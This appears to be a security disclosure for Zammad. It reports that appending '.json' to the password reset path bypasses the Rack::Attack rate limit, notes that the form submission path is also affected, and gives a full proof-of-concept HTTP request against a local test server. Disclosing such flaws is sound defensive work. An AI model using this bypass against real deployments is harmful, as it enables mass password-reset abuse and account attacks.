Zammad relies on the rack_attack.rb file to defend the application against various brute force attacks, including forgotten password requests, ticket submissions, etc. The currently utilized Rack_Attack.rb file’s configuration attempts to prevent password reset requests per IP to 3 per minute. This resulted in 429 errors being issued after the 3rd attempt, as declared in the Rack_Attack file. This works appropriately until the tester placed a random string after the /api/v1/users/password_reset path location in a captured Proxy request. Appending the characters “.json” to the end of /api/v1/users/password_reset (/api/v1/users/password_reset.json) allowed the tester to run hundreds of password reset requests against the server, bypassing the Rack_Attack restrictions.
The /api/v1/form_submit path was also found to be vulnerable.
Password Reset PoC - Note .json appended to end of path
POST /api/v1/users/password_reset.json HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-CSRF-Token: tF2RQB380o7ulITTsKuhSzZKgtqqMkbILL+gIpCMi0p7g0wN+lC/oA3lnIH0FOi17kCiO5DrJ6G4fm4Q9i8FZg==
Content-Length: 33
Origin: http://localhost:8080
DNT: 1
Connection: close
Cookie: _zammad_session_a138cfd0f37=9a80633fcf555db2687c7f22b114d42f
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"username":"def@mayorsec%2ecom"}